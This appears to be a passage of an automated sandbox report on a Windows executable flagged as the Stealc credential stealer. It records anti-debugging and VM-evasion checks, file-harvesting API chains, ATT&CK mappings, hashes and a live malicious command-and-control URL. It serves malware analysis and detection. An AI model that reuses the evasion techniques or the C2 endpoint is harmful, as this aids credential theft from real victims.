                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528037B second address: 52803C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBE444F40B6h 0x0000000f push eax 0x00000010 jmp 00007FBE444F40ABh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBE444F40B5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803C5 second address: 52803CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803CB second address: 52803DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803DC second address: 52803E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52803E2 second address: 52803E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5D8F second address: 5D5DA4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FBE44D3A536h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5DA4 second address: 5D5DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 421E62 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 421E75 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5CB5F4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EEEEB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D1BE9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64E470 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001D38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001D4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001CDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001CE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001CED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001D4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001CBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001D3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C1160 GetSystemInfo,ExitProcess,0_2_001C1160
                Source: file.exe, file.exe, 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1771323751.0000000001503000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13493
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13516
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13496
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13508
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13548
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C45C0 VirtualProtect ?,00000004,00000100,000000000_2_001C45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9750 mov eax, dword ptr fs:[00000030h]0_2_001D9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001D7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7480, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001D9600
                Source: file.exe, file.exe, 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2d$Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_001D7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_001D6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001D7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_001D7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7480, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7480, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php?M9file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpRLfile.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php-file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/rosoftfile.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://185.215.113.37efile.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpyfile.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1532619
                            Start date and time:2024-10-13 18:58:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 16s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 80
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.9493399173853225
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'819'136 bytes
                            MD5:7299a751b9b88863206dd5259f551f8e
                            SHA1:bebfc704d946a2b845a05beb83a6960ad7aefba2
                            SHA256:613b4f35bfac7662559bd5c36e06493e60463f11d443ddd8d334bd361ea8d969
                            SHA512:801bb991e4348b24b1a5fdfa9e28eb5d5996938189646f51d0f04ad3b504232612b6f38fec7509424178331659d2b8a491f84ea9410063ca7974295fff3303c3
                            SSDEEP:49152:YCMyaABt4U8Cul9vfCaxGLM558pMgccSAeUDO6Sph0F:YCMyTny3vduy5KP5kh0
                            TLSH:B88533CC4BD68EBAC5E86F73E7B235C31AA405D952A807B578A44777920F4BF2703246
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xa90000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FBE45123CFAh
                            push fs
                            sbb eax, dword ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007FBE45125CF5h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [esi], al
                            or al, byte ptr [eax]
                            add byte ptr [edx+ecx], al
                            add byte ptr [eax], al
                            add eax, 0200000Ah
                            or al, byte ptr [eax]
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800dc69cf9b67b1f1b18764e900724b2133unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x29b0000x200eec589aa36359981257396e511cc0d37unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            ncanagua0x4f90000x1960000x1960005f30712ff3fab382ea6b7df5a6b5c317False0.9948477909482759data7.954392600986758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            tdiayxtm0x68f0000x10000x4007fb76f52c9c9be78e2e6ec10c68adbd8False0.8447265625data6.353377991578972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6900000x30000x220020be6e12b5e5e719289bf315f9910538False0.06491268382352941DOS executable (COM)0.781113513080496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

